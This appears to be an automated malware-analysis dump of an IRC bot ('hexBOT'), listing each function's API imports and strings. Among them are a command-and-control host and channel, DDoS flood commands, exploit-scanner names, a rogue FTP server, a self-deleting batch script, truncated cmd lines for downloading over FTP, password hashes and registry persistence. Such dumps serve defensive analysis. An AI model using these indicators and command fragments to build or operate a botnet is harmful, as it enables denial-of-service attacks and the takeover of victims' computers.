sub_outside():
	WS2_32.socket
	WS2_32.htons
	WS2_32.inet_addr
	WS2_32.connect
	WS2_32.closesocket
	KERNEL32.Sleep
	WS2_32.send
	KERNEL32.GetVersionExA
	KERNEL32.GetTickCount
	KERNEL32.GetLocaleInfoA

sub_41725D(0126):
	KERNEL32.SetUnhandledExceptionFilter

sub_404B10(03c8):
	NTDLL.RtlGetLastWin32Error
	KERNEL32.FormatMessageA

	"%s	Error: %s <%d>."

sub_4053E4(04c3):
	KERNEL32.GetTickCount

sub_415EDF(06bc):
	KERNEL32.GetCPInfo

sub_40DE6E(081d):
	KERNEL32.GetTickCount

sub_410B5C(0828):
	KERNEL32.GetVersion
	KERNEL32.GetCommandLineA
	KERNEL32.GetStartupInfoA
	KERNEL32.GetModuleHandleA

sub_41174A(0a41):
	KERNEL32.HeapCreate
	KERNEL32.HeapDestroy

sub_4101B6(0dee):
	KERNEL32.GetLocalTime
	KERNEL32.GetSystemTime
	KERNEL32.GetTimeZoneInformation

sub_418081(0e35):
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcAddress

	"user32.dll"
	"MessageBoxA"
	"GetActiveWindow"
	"GetLastActivePopup"

sub_4027C1(0ff5):
	WS2_32.inet_addr
	WS2_32.htons
	WS2_32.socket
	WS2_32.connect
	WS2_32.recv
	WS2_32.send
	WS2_32.closesocket

	"cmd /c echo open %s %d >> ii &echo user"...

sub_401294(10b1):
	WS2_32.htons

	"FXNBFXFXNBFXFXFXFX"
	"FXNBFXFXNBFXFXFXFX"

sub_405076(1183):
	KERNEL32.Sleep
	KERNEL32.SetFileAttributesA
	KERNEL32.CreateFileA
	KERNEL32.GetFileTime
	KERNEL32.CloseHandle
	KERNEL32.ExitThread
	KERNEL32.SetFileTime

	"r+b"
	"#f"

sub_40DD29(12e2):
	KERNEL32.ExitThread

sub_407067(14f2):
	WS2_32.socket
	WS2_32.setsockopt
	WS2_32.WSAGetLastError
	WS2_32.inet_addr
	WS2_32.htons
	KERNEL32.GetTickCount
	WS2_32.getsockname
	WS2_32.sendto
	WS2_32.closesocket

sub_40DECC(18ca):
	KERNEL32.GetTickCount

sub_41639F(18d1):
	KERNEL32.GetModuleFileNameA

	"C:\\m_unpacker\\packed.exe"

sub_406851(1c83):
	KERNEL32.GetTickCount
	KERNEL32.ExitThread

sub_40DE07(1e2b):
	KERNEL32.OpenProcess
	KERNEL32.TerminateProcess
	KERNEL32.CloseHandle

sub_4142A8(22de):
	NTDLL.RtlSizeHeap

sub_408318(24da):
	WS2_32.inet_addr
	WS2_32.socket
	WS2_32.htons
	WS2_32.connect
	WS2_32.send
	WS2_32.recv
	WS2_32.closesocket

sub_403430(28ed):
	WS2_32.inet_ntoa

sub_409802(2a81):
	WS2_32.send
	WS2_32.closesocket
	KERNEL32.Sleep
	WS2_32.recv

	"PASS	%s\r\n"

sub_41610A(2f2e):
	KERNEL32.UnhandledExceptionFilter

sub_404E6A(323b):
	"."

sub_417AF5(33c3):
	KERNEL32.GetTimeZoneInformation
	KERNEL32.WideCharToMultiByte

	"TZ"

sub_404F02(3429):
	WS2_32.inet_addr
	WS2_32.gethostbyname

sub_4037AE(35fb):
	KERNEL32.GetTickCount
	WS2_32.inet_ntoa
	NTDLL.RtlEnterCriticalSection
	NTDLL.RtlLeaveCriticalSection
	KERNEL32.Sleep
	KERNEL32.ExitThread

	"dcom135"

sub_404B9A(36e0):
	USER32.FindWindowA
	KERNEL32.CreateFileMappingA
	KERNEL32.MapViewOfFile
	USER32.SendMessageA
	KERNEL32.UnmapViewOfFile
	KERNEL32.CloseHandle

	"mIRC"

sub_40362D(3b1d):
	WS2_32.htonl

sub_404CE2(3cc3):
	KERNEL32.GetTempPathA
	KERNEL32.CreateFileA
	KERNEL32.WriteFile
	KERNEL32.CloseHandle
	KERNEL32.GetModuleHandleA
	KERNEL32.GetModuleFileNameA
	KERNEL32.GetFileAttributesA
	KERNEL32.SetFileAttributesA
	KERNEL32.ExpandEnvironmentStringsA
	KERNEL32.CreateProcessA

	"%sdel.bat"
	"@echo	off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
	"%%comspec%% /c %s	%s"

sub_404C1C(3f4b):
	KERNEL32.SearchPathA
	KERNEL32.CreateFileA
	KERNEL32.GetFileTime
	KERNEL32.CloseHandle
	KERNEL32.SetFileTime

	"explorer.exe"

sub_404FE0(3fc1):
	KERNEL32.GetVersionExA

	"2"

sub_4095BB(4133):
	WS2_32.htons
	WS2_32.socket
	WS2_32.connect
	KERNEL32.GetSystemDirectoryA
	KERNEL32.CreateThread
	KERNEL32.Sleep
	WS2_32.closesocket

	"%s\\drivers\\tcpip.sys"

sub_4084CC(431f):
	WS2_32.send
	KERNEL32.Sleep

	"NOTICE"
	"PRIVMSG"

sub_409034(451f):
	KERNEL32.GetTickCount
	KERNEL32.SetErrorMode
	KERNEL32.CreateMutexA
	KERNEL32.WaitForSingleObject
	KERNEL32.ExitProcess
	WS2_32.WSAStartup
	KERNEL32.GetSystemDirectoryA
	KERNEL32.GetModuleHandleA
	KERNEL32.GetModuleFileNameA
	KERNEL32.GetFileAttributesA
	KERNEL32.SetFileAttributesA
	KERNEL32.CopyFileA
	NTDLL.RtlGetLastWin32Error
	KERNEL32.Sleep
	KERNEL32.GetCurrentProcessId
	KERNEL32.OpenProcess
	KERNEL32.CreateProcessA
	KERNEL32.CloseHandle
	WS2_32.WSACleanup
	KERNEL32.DeleteFileA
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey
	WININET.InternetGetConnectedState

	"hortsfor"
	"%s%s"
	"%s\\%s"
	"%s %d \"%s\""
	"%s\\%s"
	"Internet"
	"%s:*:Enabled:%s"
	"SYSTEM\\CurrentControlSet\\Services\\Share"...
	"saber4.ircqforum.com"
	"#FAAK#"
	"saad."
	"saber4.ircqforum.com"
	"#FAAK#"
	"saad."
	"#FAAK#"
	"saad."

sub_411602(45c9):
	KERNEL32.GetVersionExA
	KERNEL32.GetEnvironmentVariableA
	KERNEL32.GetModuleFileNameA

	"__MSVCRT_HEAP_SELECT"
	"__GLOBAL_HEAP_SELECTED"

sub_4132AC(4634):
	KERNEL32.GetModuleHandleA
	KERNEL32.GetProcAddress

	"KERNEL32"
	"IsProcessorFeaturePresent"

sub_417719(4712):
	KERNEL32.SetStdHandle

sub_407C5D(4800):
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegDeleteValueA
	ADVAPI32.RegCloseKey

sub_4133D3(502f):
	"e+000"

sub_4176A2(545a):
	KERNEL32.SetStdHandle

sub_4158A4(547a):
	KERNEL32.LCMapStringW
	KERNEL32.LCMapStringA
	KERNEL32.MultiByteToWideChar
	KERNEL32.WideCharToMultiByte

sub_40E311(5581):
	KERNEL32.TerminateThread
	WS2_32.closesocket

sub_4115D5(5645):
	KERNEL32.GetModuleHandleA

sub_4125E6(58ed):
	KERNEL32.VirtualAlloc

sub_4177D0(5a27):
	KERNEL32.FlushFileBuffers
	NTDLL.RtlGetLastWin32Error

sub_4032AB(5b7c):
	KERNEL32.GetModuleFileNameA
	WS2_32.send
	WS2_32.closesocket
	WS2_32.WSACleanup

	"rb"

sub_406FF0(5d47):
	KERNEL32.ExitThread

sub_402147(5f99):
	WS2_32.send

	"GET /	HTTP/1.0\r\nHost: %s\r\nAuthorization"...

sub_406906(5fa9):
	WS2_32.WSAStartup
	WS2_32.WSASocketA
	WS2_32.setsockopt
	WS2_32.htons
	WS2_32.htonl
	KERNEL32.QueryPerformanceFrequency
	KERNEL32.QueryPerformanceCounter
	WS2_32.sendto
	WS2_32.WSAGetLastError
	WS2_32.closesocket
	WS2_32.WSACleanup

sub_419853(5fbb):
	"invalid string position"

sub_414008(6050):
	NTDLL.RtlAllocateHeap
	NTDLL.RtlReAllocateHeap

sub_415560(6091):
	KERNEL32.SetFilePointer
	NTDLL.RtlGetLastWin32Error

sub_418885(6338):
	"1#SNAN"
	"1#IND"
	"1#INF"
	"1#QNAN"

sub_406CED(636f):
	WS2_32.inet_addr
	KERNEL32.ExitThread

sub_411EFD(64eb):
	KERNEL32.VirtualAlloc

sub_40997B(64f5):
	WS2_32.getsockname
	WS2_32.inet_addr
	KERNEL32.CreateThread
	KERNEL32.Sleep
	NTDLL.RtlGetLastWin32Error
	KERNEL32.lstrcmpi
	WS2_32.closesocket
	WS2_32.WSACleanup
	KERNEL32.ExitProcess
	KERNEL32.GetTempPathA
	WS2_32.inet_ntoa
	KERNEL32.DeleteFileA
	DNSAPI.DnsFlushResolverCache
	KERNEL32.GetTickCount
	KERNEL32.GetModuleFileNameA
	KERNEL32.CreateProcessA
	KERNEL32.GetVersionExA

	" :"
	"!"
	"PING"
	"PONG	%s\r\n"
	"JOIN	%s %s\r\n"
	"001"
	"005"
	"302"
	"@"
	"433"
	"NICK	%s\r\n"
	"KICK"
	"NOTICE %s :%s\r\n"
	"JOIN	%s %s\r\n"
	"NICK"
	":%s%s"
	"PART"
	"QUIT"
	"PART"
	"NOTICE %s :%s\r\n"
	"PRIVMSG"
	"NOTICE"
	"332"
	"!"
	"~"
	"cool"
	"NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
	"NOTICE %s :You've been logged.\r\n"
	"%s has just versioned	me."
	"NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
	"NOTICE %s :You've been logged.\r\n"
	"cool"
	"332"
	" :"
	"synstop"
	"skysynstop"
	"targa3stop"
	"wonkstop"
	"packetstop"
	"tsunamistop"
	"wisdomstop"
	"udpstop"
	"pingstop"
	"com.ps.off"
	"Secure"
	"scanstop"
	"Scan"
	"stats"
	"st"
	"nb32.reconnect"
	"nb32.r"
	"nb32.disconnect"
	"nb32.d"
	"nb32.quit"
	"nb32.q"
	"nb32.status"
	"nb32.s"
	"nb32.id"
	"nb32.i"
	"com.rebewt"
	"com.restart"
	"com.r"
	"threads.list"
	"threads.l"
	"nb32.aliases"
	"nb32.al"
	"nb32.log"
	"nb32.lg"
	"util.clg"
	"com.netinfo"
	"com.ni"
	"com.sysinfo"
	"com.si"
	"com.procs"
	"com.ps"
	"spoof"
	"off"
	"%d.%d.%d.*"
	"icmpflood"
	"icmp"
	"targa3"
	"t3"
	"tsunami"
	"synflood"
	"syn"
	"skysyn"
	"phatwonk"
	"wonk"
	""
	"%d. %s"
	"util.fdns"
	"currentip"
	"3127659d403389d0911ed325a6e24f12"
	"5e4b401fd2dc9fac49cf77c64c91218c"
	"hortsfor"
	"eae2a4a6649ddf699412d162c4337675"
	"asc"
	"as"
	"udpflood"
	"udp"
	"u"
	"pingflood"
	"ping"
	"p"
	"nb32.nick"
	"nb32.n"
	"nb32.join"
	"nb32.j"
	"nb32.part"
	"nb32.pt"
	"nb32.raw"
	"nb32.ra"
	"threads.kill"
	"threads.k"
	"nb32.se"
	"com.killprocname"
	"com.kpn"
	"com.prockillid"
	"com.pkid"
	"com.delete"
	"com.del"
	"mirc.cmd"
	"mirc.cmd"
	"nb32.gethost"
	"nb32.gh"
	"nb32.privmsg"
	"nb32.pm"
	"nb32.action"
	"nb32.ac"
	"nb32.cycle"
	"nb32.cy"
	"nb32.mode"
	"nb32.m"
	"advscan"
	"#f"
	"#f"
	"#f"
	"Random"
	"Sequential"
	"332"
	"JOIN	%s %s\r\n"
	"JOIN	%s %s\r\n"
	"NICK	%s\r\n"
	"ICMP.dll not available"
	"#f"
	"JOIN	%s %s\r\n"
	"#f"
	"Random"
	"Sequential"
	"full"
	"Clone	running... now restarting..."
	"Restart failed. Couldn't open file: %s"
	"hortsfor"
	"QUIT	:%s\r\n"
	"QUIT :later\r\n"
	"QUIT :disconnecting\r\n"
	"QUIT :reconnecting\r\n"
	"hexBOT By n00b"
	"2"
	"332"
	"NICK	%s\r\n"
	"USERHOST %s\r\n"
	"-xt+iB"
	"MODE	%s %s\r\n"
	"JOIN	%s %s\r\n"

sub_416AAF(66df):
	KERNEL32.WideCharToMultiByte

sub_40ECAF(6c37):
	NTDLL.RtlFreeHeap

sub_407467(6cb9):
	WS2_32.connect
	WS2_32.ioctlsocket
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.getsockopt

sub_401D69(6e81):
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.recv

sub_408FD8(70c5):
	"%s%02X"

sub_40DB61(730e):
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Process32First
	KERNEL32.Process32Next
	KERNEL32.Module32First
	KERNEL32.CloseHandle
	KERNEL32.OpenProcess
	KERNEL32.TerminateProcess

	"SeDebugPrivilege"
	" %s (%d)"
	"SeDebugPrivilege"

sub_40E8C0(7566):
	NTDLL.RtlAllocateHeap

sub_402C55(7d75):
	WS2_32.WSAStartup
	WS2_32.socket
	WS2_32.setsockopt
	WS2_32.ioctlsocket
	WS2_32.htons
	WS2_32.bind
	WS2_32.listen
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.accept
	WS2_32.send
	WS2_32.recv
	WS2_32.closesocket

	"220 StnyFtpd 0wns j0\n"
	"%s %s"
	"USER"
	"331 Password required\n"
	"PASS"
	"230 User logged in.\n"
	"SYST"
	"215 StnyFtpd\n"
	"REST"
	"350 Restarting.\n"
	"257 \"/\" is current directory.\n"
	"TYPE"
	"A"
	"200 Type set to A.\n"
	"TYPE"
	"I"
	"200 Type set to I.\n"
	"PASV"
	"425 Passive not supported on this serve"...
	"LIST"
	"226 Transfer complete\n"
	"PORT"
	"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
	"%x%x\n"
	"%s.%s.%s.%s"
	"200 PORT command successful.\n"
	"RETR"
	"150 Opening BINARY mode data connection"...
	"226 Transfer complete.\n"
	"425 Can't open data connection.\n"
	"QUIT"
	"221 Goodbye happy r00ting.\n"

sub_41920C(8107):
	KERNEL32.CompareStringW
	KERNEL32.CompareStringA
	KERNEL32.GetCPInfo
	KERNEL32.MultiByteToWideChar

sub_41745D(81be):
	KERNEL32.GetStringTypeW
	KERNEL32.GetStringTypeA
	KERNEL32.MultiByteToWideChar

sub_4010F9(840c):
	KERNEL32.MultiByteToWideChar

	"\\\\"

sub_414EFB(84ec):
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error

sub_4117A7(8555):
	NTDLL.RtlAllocateHeap

sub_405E2C(862d):
	KERNEL32.GetTickCount
	WS2_32.socket
	WS2_32.inet_addr
	WS2_32.gethostbyname
	KERNEL32.ExitThread
	WS2_32.htons
	WS2_32.sendto
	KERNEL32.Sleep

sub_40E464(8732):
	"%s: %s stopped. (%d thread(s)	stopped.)"...
	"%s: No %s thread found."

sub_41181A(87ad):
	KERNEL32.VirtualFree
	NTDLL.RtlFreeHeap

sub_40F360(8af0):
	NTDLL.RtlUnwind

sub_4172A2(8bd2):
	KERNEL32.IsBadCodePtr

sub_417827(8dd2):
	KERNEL32.CreateFileA
	KERNEL32.GetFileType
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error

sub_4011DC(90cb):
	KERNEL32.MultiByteToWideChar
	KERNEL32.Sleep

	"\\\\"

sub_415AF3(94b9):
	KERNEL32.WriteFile
	NTDLL.RtlGetLastWin32Error

sub_40322E(9713):
	WS2_32.WSAStartup
	WS2_32.socket
	WS2_32.inet_addr
	WS2_32.htons
	WS2_32.connect
	WS2_32.closesocket
	WS2_32.WSACleanup

sub_401DE8(981b):
	WS2_32.htonl
	WS2_32.send

sub_407CCD(9904):
	WININET.InternetOpenUrlA
	KERNEL32.CreateFileA
	KERNEL32.ExitThread
	KERNEL32.GetTickCount
	WININET.InternetReadFile
	KERNEL32.WriteFile
	KERNEL32.CloseHandle
	KERNEL32.Sleep
	WS2_32.WSACleanup
	KERNEL32.ExitProcess
	KERNEL32.CreateProcessA
	WININET.InternetCloseHandle

	"open"

sub_4172D1(9a80):
	KERNEL32.MultiByteToWideChar

sub_4039C6(9b43):
	WS2_32.inet_addr
	NTDLL.RtlDeleteCriticalSection
	KERNEL32.InitializeCriticalSectionAndSpinCount
	KERNEL32.CreateThread
	KERNEL32.Sleep
	NTDLL.RtlGetLastWin32Error
	WS2_32.inet_ntoa
	KERNEL32.ExitThread

sub_40E293(9c71):
	"%d. %s"

sub_404CC0(9dbe):
	USER32.ExitWindowsEx

	"SeShutdownPrivilege"

sub_41726A(9ed0):
	KERNEL32.IsBadReadPtr

sub_417286(9ed0):
	KERNEL32.IsBadWritePtr

sub_401F07(a2f7):
	WS2_32.send

sub_403711(a6ca):
	WS2_32.socket
	WS2_32.htons
	WS2_32.ioctlsocket
	WS2_32.connect
	WS2_32.select
	WS2_32.closesocket

sub_40544D(a7c4):
	KERNEL32.Sleep

sub_415CA0(a8e4):
	KERNEL32.GetOEMCP
	KERNEL32.GetCPInfo

sub_419BCE(aeff):
	KERNEL32.RaiseException

sub_410C77(af5c):
	KERNEL32.ExitProcess

sub_404F2B(b1e5):
	DNSAPI.DnsFlushResolverCache

sub_406593(b2cf):
	WS2_32.inet_addr
	KERNEL32.ExitThread

sub_406287(b2d9):
	WS2_32.WSAStartup
	WS2_32.WSASocketA
	WS2_32.setsockopt
	WS2_32.htons
	KERNEL32.QueryPerformanceFrequency
	KERNEL32.QueryPerformanceCounter
	WS2_32.htonl
	WS2_32.sendto
	WS2_32.WSAGetLastError
	WS2_32.closesocket
	WS2_32.WSACleanup

sub_40502F(b3f6):
	KERNEL32.MultiByteToWideChar
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcAddress

	"sfc_os.dll"

sub_407B2E(ba2e):
	KERNEL32.ExitThread

sub_40DAF6(bbe1):
	KERNEL32.GetCurrentProcess
	ADVAPI32.OpenProcessToken
	ADVAPI32.LookupPrivilegeValueA
	ADVAPI32.AdjustTokenPrivileges
	KERNEL32.CloseHandle

sub_406DA5(bfed):
	KERNEL32.GetTickCount
	WS2_32.socket
	WS2_32.getsockname
	WS2_32.inet_addr
	WS2_32.htons
	WS2_32.sendto
	WS2_32.closesocket

sub_4151BF(c6bf):
	KERNEL32.ReadFile
	NTDLL.RtlGetLastWin32Error

sub_408486(c85a):
	WS2_32.send

sub_4153B5(c890):
	KERNEL32.GetStartupInfoA
	KERNEL32.GetFileType
	KERNEL32.GetStdHandle
	KERNEL32.LockResource

sub_4073B3(c918):
	WS2_32.inet_addr
	KERNEL32.ExitThread

sub_4081F8(cb3a):
	WS2_32.closesocket
	WS2_32.WSACleanup
	KERNEL32.Sleep
	KERNEL32.GetSystemDirectoryA
	KERNEL32.GetModuleFileNameA
	KERNEL32.CreateProcessA
	KERNEL32.CloseHandle
	KERNEL32.ExitProcess

sub_40F0BC(cba9):
	NTDLL.RtlUnwind

sub_411E4C(cbe8):
	NTDLL.RtlReAllocateHeap
	NTDLL.RtlAllocateHeap
	KERNEL32.VirtualAlloc
	NTDLL.RtlFreeHeap

sub_40296B(cd35):
	WS2_32.recv

sub_401000(ce4a):
	WS2_32.inet_addr
	WS2_32.htons
	WS2_32.socket
	WS2_32.connect
	WS2_32.recv
	WS2_32.send
	KERNEL32.Sleep
	WS2_32.closesocket

	"cmd /k echo open %s %d > o&echo user 1 "...

sub_40574C(cf39):
	WININET.InternetGetConnectedStateEx

sub_4029A4(d05c):
	WS2_32.send

sub_412AA6(d2f6):
	KERNEL32.RaiseException

sub_4014EF(d4be):
	KERNEL32.CreateFileA
	KERNEL32.TransactNamedPipe
	KERNEL32.WriteFile
	KERNEL32.CloseHandle
	WS2_32.socket
	WS2_32.htons
	WS2_32.inet_addr
	WS2_32.connect
	WS2_32.send
	WS2_32.recv
	WS2_32.closesocket
	KERNEL32.Sleep

sub_407550(d5a5):
	WS2_32.WSASocketA
	WS2_32.setsockopt
	KERNEL32.GetTickCount
	WS2_32.htons
	WS2_32.socket
	WS2_32.closesocket
	WS2_32.inet_addr
	WS2_32.htonl
	WS2_32.sendto
	KERNEL32.Sleep

sub_4060E1(d826):
	WS2_32.htons
	WS2_32.socket
	WS2_32.ioctlsocket
	WS2_32.connect
	KERNEL32.Sleep
	WS2_32.closesocket

sub_41724C(d8fa):
	KERNEL32.SetUnhandledExceptionFilter

sub_405CA0(da39):
	IPHLPAPI.IcmpCreateFile
	WS2_32.inet_addr
	WS2_32.gethostbyname
	KERNEL32.ExitThread
	IPHLPAPI.IcmpSendEcho
	IPHLPAPI.IcmpCloseHandle

sub_418C8A(db0a):
	KERNEL32.SetEndOfFile
	NTDLL.RtlGetLastWin32Error

start(dbf7):
	KERNEL32.WideCharToMultiByte

sub_4165EC(dcdc):
	KERNEL32.GetEnvironmentStringsW
	KERNEL32.GetEnvironmentStrings
	KERNEL32.WideCharToMultiByte
	KERNEL32.FreeEnvironmentStringsW
	KERNEL32.FreeEnvironmentStringsA

sub_4122EE(df93):
	NTDLL.RtlAllocateHeap
	KERNEL32.VirtualAlloc
	KERNEL32.VirtualFree
	NTDLL.RtlFreeHeap

sub_404F3A(e076):
	WS2_32.getsockname

sub_4061E8(e101):
	KERNEL32.ExitThread

sub_406042(e101):
	KERNEL32.ExitThread

sub_4058B9(e17c):
	WS2_32.socket
	WS2_32.WSAGetLastError
	KERNEL32.ExitThread
	WS2_32.setsockopt
	WS2_32.inet_addr
	WS2_32.htons
	KERNEL32.GetTickCount
	WS2_32.sendto
	WS2_32.closesocket

sub_408F2E(e21a):
	"€"

sub_419489(e51d):
	KERNEL32.SetEnvironmentVariableA

sub_41085B(e781):
	KERNEL32.GetCurrentProcess
	KERNEL32.TerminateProcess
	KERNEL32.ExitProcess

sub_412432(ea79):
	KERNEL32.VirtualFree
	NTDLL.RtlFreeHeap

sub_403C25(eb03):
	KERNEL32.GetModuleHandleA
	KERNEL32.GetProcAddress
	NTDLL.RtlGetLastWin32Error
	KERNEL32.LoadLibraryA
	WININET.InternetOpenA

	"kernel32.dll"
	"SetErrorMode"
	"CreateToolhelp32Snapshot"
	"Process32First"
	"GetDiskFreeSpaceExA"
	"GetLogicalDriveStringsA"
	"SearchPathA"
	"QueryPerformanceCounter"
	"QueryPerformanceFrequency"
	"RegisterServiceProcess"
	"user32.dll"
	"SendMessageA"
	"FindWindowA"
	"IsWindow"
	"GetClipboardData"
	"CloseClipboard"
	"GetAsyncKeyState"
	"GetKeyState"
	"GetWindowTextA"
	"GetForegroundWindow"
	"advapi32.dll"
	"RegCreateKeyExA"
	"RegSetValueExA"
	"RegQueryValueExA"
	"RegDeleteValueA"
	"RegCloseKey"
	"OpenProcessToken"
	"LookupPrivilegeValueA"
	"AdjustTokenPrivileges"
	"OpenSCManagerA"
	"OpenServiceA"
	"ControlService"
	"CloseServiceHandle"
	"EnumServicesStatusA"
	"IsValidSecurityDescriptor"
	"GetUserNameA"
	"gdi32.dll"
	"CreateDCA"
	"CreateDIBSection"
	"CreateCompatibleDC"
	"GetDIBColorTable"
	"SelectObject"
	"BitBlt"
	"DeleteDC"
	"DeleteObject"
	"ws2_32.dll"
	"WSAStartup"
	"WSASocketA"
	"WSAAsyncSelect"
	"__WSAFDIsSet"
	"WSAIoctl"
	"WSAGetLastError"
	"WSACleanup"
	"socket"
	"ioctlsocket"
	"connect"
	"inet_ntoa"
	"inet_addr"
	"htons"
	"htonl"
	"ntohs"
	"ntohl"
	"send"
	"sendto"
	"recv"
	"recvfrom"
	"bind"
	"select"
	"listen"
	"accept"
	"setsockopt"
	"getsockname"
	"gethostname"
	"getpeername"
	"closesocket"
	"wininet.dll"
	"InternetGetConnectedState"
	"InternetGetConnectedStateEx"
	"HttpOpenRequestA"
	"HttpSendRequestA"
	"InternetConnectA"
	"InternetOpenUrlA"
	"InternetCrackUrlA"
	"InternetReadFile"
	"InternetCloseHandle"
	"Mozilla/4.0 (compatible)"
	"icmp.dll"
	"IcmpCreateFile"
	"IcmpCloseHandle"
	"IcmpSendEcho"
	"netapi32.dll"
	"NetShareAdd"
	"NetShareDel"
	"NetShareEnum"
	"NetScheduleJobAdd"
	"NetApiBufferFree"
	"NetRemoteTOD"
	"NetUserAdd"
	"NetUserDel"
	"NetUserEnum"
	"NetUserGetInfo"
	"NetMessageBufferSend"
	"dnsapi.dll"
	"DnsFlushResolverCache"
	"DnsFlushResolverCacheEntry_A"
	"iphlpapi.dll"
	"DeleteIpNetEntry"
	"mpr.dll"
	"WNetAddConnection2A"
	"WNetAddConnection2W"
	"WNetCancelConnection2A"
	"WNetCancelConnection2W"
	"shell32.dll"
	"SHChangeNotify"
	"odbc32.dll"
	"SQLDriverConnect"
	"SQLAllocHandle"
	"avicap32.dll"
	"capCreateCaptureWindowA"
	"capGetDriverDescriptionA"

sub_407A4E(edda):
	KERNEL32.GetLocalTime

	"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"

sub_41810A(ef2b):
	NTDLL.RtlAllocateHeap

sub_401A03(f1cc):
	"CCCC"

sub_40E241(f21d):
	KERNEL32.ExitThread

sub_405503(f453):
	KERNEL32.GetVersionExA
	ADVAPI32.GetUserNameA
	WS2_32.inet_addr
	WS2_32.gethostbyaddr
	KERNEL32.GetSystemDirectoryA
	KERNEL32.GetDateFormatA
	KERNEL32.GetTimeFormatA
	KERNEL32.GlobalMemoryStatus

	"95"
	"NT"
	"98"
	"ME"
	"2K"
	"XP"
	"2003"
	"couldn't resolve host"

sub_416839(fc50):
	KERNEL32.GetModuleFileNameA
	KERNEL32.GetStdHandle
	KERNEL32.WriteFile

	""
	"..."
	"Runtime Error!\n\nProgram: "
	"\n\n"
	"Microsoft Visual C++ Runtime Library"

sub_406636(fcb9):
	WS2_32.gethostname
	WS2_32.gethostbyname
	WS2_32.socket
	WS2_32.setsockopt
	KERNEL32.GetTickCount
	WS2_32.htons
	WS2_32.sendto
	WS2_32.closesocket

sub_41919E(fe6c):
	KERNEL32.WideCharToMultiByte

sub_4034A7(ff56):
	KERNEL32.GetModuleFileNameA
	KERNEL32.CreateThread
	KERNEL32.Sleep
	NTDLL.RtlGetLastWin32Error

sub_412488(ffe7):
	KERNEL32.VirtualFree